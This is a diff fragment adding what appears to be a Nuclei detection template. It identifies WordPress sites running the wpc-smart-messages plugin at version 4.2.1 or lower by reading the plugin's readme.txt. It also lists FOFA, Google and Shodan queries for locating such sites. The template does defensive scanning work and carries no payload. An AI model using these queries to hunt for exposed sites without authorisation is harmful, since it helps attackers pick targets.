reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file